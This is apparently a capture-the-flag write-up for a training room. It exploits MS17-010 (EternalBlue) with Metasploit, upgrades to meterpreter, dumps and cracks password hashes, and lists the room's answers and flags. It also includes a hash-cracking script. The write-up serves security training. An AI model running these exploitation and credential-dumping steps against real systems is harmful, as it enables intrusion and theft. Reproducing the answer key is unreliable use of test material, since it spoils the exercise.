Hmm, this one should be EternalBlue, heh.

Blue


*Recon

Start the target machine and the attack box (the one on the internal network), then scan with the following command:

nmap -A -T 5 -p- 10.10.159.213

image-20200713114653348.png

Here -A turns on OS and version detection plus the default scripts, -p- covers all 65535 TCP ports, and -T 5 is the most aggressive timing template. On a slow VPN link -T5 can miss ports, so drop to -T4 if the results look thin.

We can see 3 open ports below 1000: 135, 139 and 445, so this machine is clearly running SMB.
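To answer "how many open ports under 1000" without reading a screenshot, the scan can be written out in greppable form (-oG) and parsed. The script below is an added example, not part of the original writeup; it parses constructed -oG text (the three low ports the writeup reports plus one made-up high port, so the filter has something to exclude) and reports the open ports, the count under 1000, and whether SMB is exposed.

```python
import re

# Constructed sample of nmap greppable (-oG) output for the scan above. The three
# low ports are the ones the writeup reports; 49152 is added here only so the
# "under 1000" filter has something to exclude. This is not real scan output.
SAMPLE_GREPABLE = """\
Host: 10.10.159.213 ()\tStatus: Up
Host: 10.10.159.213 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 49152/open/tcp//unknown///\tIgnored State: closed (65531)
# Nmap done
"""

# Each -oG port entry is port/state/proto/owner/service/rpcinfo/version/ ; nmap
# replaces any "/" inside the version string with "|", so "/" is a safe delimiter.
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)/")
SMB_PORTS = {139, 445}


def parse_grepable(text):
    """Return {host: [(port, state, proto, service), ...]} from -oG output."""
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t")[0]
        entries = []
        for m in PORT_RE.finditer(ports_field):
            port, state, proto, service = m.groups()
            entries.append((int(port), state, proto, service))
        results[host] = entries
    return results


def open_ports(parsed, host):
    """Sorted list of open TCP/UDP port numbers for one host."""
    return sorted(p for p, state, _, _ in parsed[host] if state == "open")


def count_open_under(parsed, host, limit=1000):
    """The room's question: how many open ports have a number below limit."""
    return sum(1 for p in open_ports(parsed, host) if p < limit)


def smb_exposed(parsed, host):
    """True if either NetBIOS session (139) or direct SMB (445) is open."""
    return bool(SMB_PORTS & set(open_ports(parsed, host)))


if __name__ == "__main__":
    parsed = parse_grepable(SAMPLE_GREPABLE)
    host = "10.10.159.213"
    print("open ports:", open_ports(parsed, host))
    print("open under 1000:", count_open_under(parsed, host))
    print("SMB exposed:", smb_exposed(parsed, host))
```

To feed it real output, add -oG scan.gnmap to the nmap command (or -oG - to write to stdout) and pass the file contents to parse_grepable.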

Run the vulnerability scripts against it:

nmap 10.10.159.213 --script vuln

image-20200713115608317.png

The vuln script category includes smb-vuln-ms17-010, which reports the host as vulnerable to MS17-010 (EternalBlue).

Answers:

#2 How many ports are open with a port number under 1000?

3

#3 What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

ms17-010

*Gain Access

That calls for Metasploit. First initialize Metasploit's database (msfconsole runs without it, but the database keeps hosts, services and loot across sessions):

msfdb init

image-20200713115934305.png

Start Metasploit and search for usable modules:

msfconsole -q
search ms17_010

image-20200713120108054.png

So we will use this one:

use 2
# or
use exploit/windows/smb/ms17_010_eternalblue
show options

Note that use 2 refers to the index in the search results you just printed, so it is only valid right after that search; the full module path is unambiguous.

image-20200713120217750.png

Set the required option (show options lists it as RHOSTS; set RHOST also works because Metasploit accepts it as an alias):

set RHOSTS 10.10.159.213

If the attack box has more than one interface, also set LHOST to the VPN-facing address (for example set LHOST tun0), otherwise the reverse payload may call back on an interface the target cannot reach.

image-20200713120320162.png

Now fire it:

exploit

image-20200713120359561.png

We now have a plain command shell. The next step is to background this session and upgrade it to a meterpreter shell.

Answers:

#2 Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

exploit/windows/smb/ms17_010_eternalblue

#3 Show options and set the one required value. What is the name of this value? (All caps for submission)

RHOSTS

*Escalate

Now we upgrade the plain shell to a meterpreter shell.

First press ctrl + z to background the current shell session (msfconsole asks "Background session 1? [y/N]"; answer y):

ctrl + z

image-20200713120637682.png

Then use the following post module to upgrade it to meterpreter:

use post/multi/manage/shell_to_meterpreter
show options

image-20200713120829485.png

Set SESSION to the ID of the session we just backgrounded. The current sessions can be listed with:

sessions -l

image-20200713120944155.png

With SESSION set, launch the module with:

run

(exploit does exactly the same thing here.)

image-20200713121152419.png

Session 2 is now open, so we can interact with it:

sessions -i 2

image-20200713121459413.png

We are now in a meterpreter shell, and can check which user we are running as:

getuid

image-20200713121549484.png

getuid reports NT AUTHORITY\SYSTEM, already the highest privilege on the box. That is the token of the process our session lives in, and the module dropped that session into whatever process the stager landed in, which is not necessarily a stable home: if that process exits, the session dies with it. The next step is therefore to migrate into a long-running process that also runs as SYSTEM, keeping the same privileges in a process that will stay alive for the hashdump that follows.

First list all running processes:

ps

image-20200713121836275.png

In this run, the cmd.exe process with PID 2164 is running as SYSTEM, so we migrate into it. The PID differs on every boot, so read it from your own ps output; migration is not always reliable, and if it fails, pick another process that runs as NT AUTHORITY\SYSTEM and try again.

migrate 2164

image-20200713122053335.png

That succeeded. The privileges of the current process can be checked with:

getprivs

image-20200713122147195.png

Answers:

#1 If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

post/multi/manage/shell_to_meterpreter

#2 Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer)

SESSION

*Cracking

Now dump the password hashes of the local accounts:

hashdump

image-20200713122348832.png

Besides the default accounts there is an extra user, Jon. Copy that whole line (pwdump format, user:rid:lmhash:nthash:::) into a file named pass and crack it with John the Ripper:

john --user=Jon --wordlist=/usr/share/wordlists/rockyou.txt --format=NT pass

--format=NT tells john the fourth field is an unsalted NT hash (MD4 over the UTF-16LE password); --user=Jon restricts cracking to that one account. The same hash cracks with hashcat using -m 1000.

image-20200713122905155.png

The password is alqfna22.
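To make clear what john is doing with --format=NT, here is an added example (not from the original writeup and not the target's real hash): a pure-Python MD4, the NT hash built on it, a parser for the pwdump line hashdump prints, and a dictionary attack over an in-memory stand-in for rockyou.txt. The sample pwdump line and wordlist are constructed; the user name testuser is hypothetical.

```python
import struct


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). Written out because OpenSSL 3 builds of
    hashlib often no longer expose md4."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), range(16)),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        R = state[:]
        for f, const, shifts, order in rounds:
            for i, k in enumerate(order):
                j = -i % 4  # register updated this step: a, d, c, b, a, d, ...
                mix = R[j] + f(R[(j + 1) % 4], R[(j + 2) % 4], R[(j + 3) % 4]) + X[k] + const
                R[j] = _lrot(mix & 0xFFFFFFFF, shifts[i % 4])
        state = [(s + r) & 0xFFFFFFFF for s, r in zip(state, R)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE password, no salt, so one guess hashes once
    for every account. This is what john --format=NT / hashcat -m 1000 attack."""
    return md4(password.encode("utf-16le")).hex()


def parse_pwdump(line: str):
    """hashdump prints pwdump format: user:rid:lmhash:nthash:::"""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return user, int(rid), lm.lower(), nt.lower()


def crack_nt(nt_hex: str, wordlist):
    """Dictionary attack: hash each candidate and compare to the target."""
    target = nt_hex.lower()
    for word in wordlist:
        if nt_hash(word) == target:
            return word
    return None


def crack_line(line: str, wordlist):
    """Crack one hashdump line; returns (user, password or None)."""
    user, _, _, nt = parse_pwdump(line)
    return user, crack_nt(nt, wordlist)


# Constructed sample input (hypothetical account, not the target's Jon line):
# the LM field is the well-known "no LM hash" value, the NT field is the NT hash
# of "password". The wordlist is a tiny stand-in for rockyou.txt.
SAMPLE_LINE = "testuser:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::"
SAMPLE_WORDLIST = ["letmein", "alqfna22", "password", "Winter2020"]

if __name__ == "__main__":
    print(crack_line(SAMPLE_LINE, SAMPLE_WORDLIST))
```

Because the NT hash has no salt, a real wordlist run is bounded only by hashing speed, which is why rockyou.txt finishes in seconds on an 8-character password like the one above; john and hashcat do the same loop with heavily optimized MD4.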

Answers:

#1 Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Jon

#2 Copy this password hash to a file and research how to crack it. What is the cracked password?

alqfna22

*Find flags!

With SYSTEM privileges, finding the flags is simple.

From the meterpreter session drop into a Windows command prompt with shell, change to the root of C:\, and run the all-purpose one-liner:

dir /S /B | findstr /I "flag*"

dir /S /B recursively lists full paths below the current directory, so it has to be run from C:\ to cover the whole drive. Note that findstr treats * as a regex repeat, so "flag*" actually means "fla" followed by any number of g's; plain findstr /I flag does the same job. Meterpreter's own search -f flag*.txt is an alternative that needs no shell at all.

The first flag is in C:\:

image-20200713123212512.png

The second flag is in C:\Windows\System32\config (next to the SAM database):

image-20200713123318136.png

The third flag is in Jon's Documents folder:

image-20200713123514626.png

Answers:

#1 Flag1? (Only submit the flag contents {CONTENTS})

access_the_machine

#2 Flag2? *Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare, however, it can happen.

sam_database_elevated_access

#3 Flag3?

admin_documents_can_be_valuable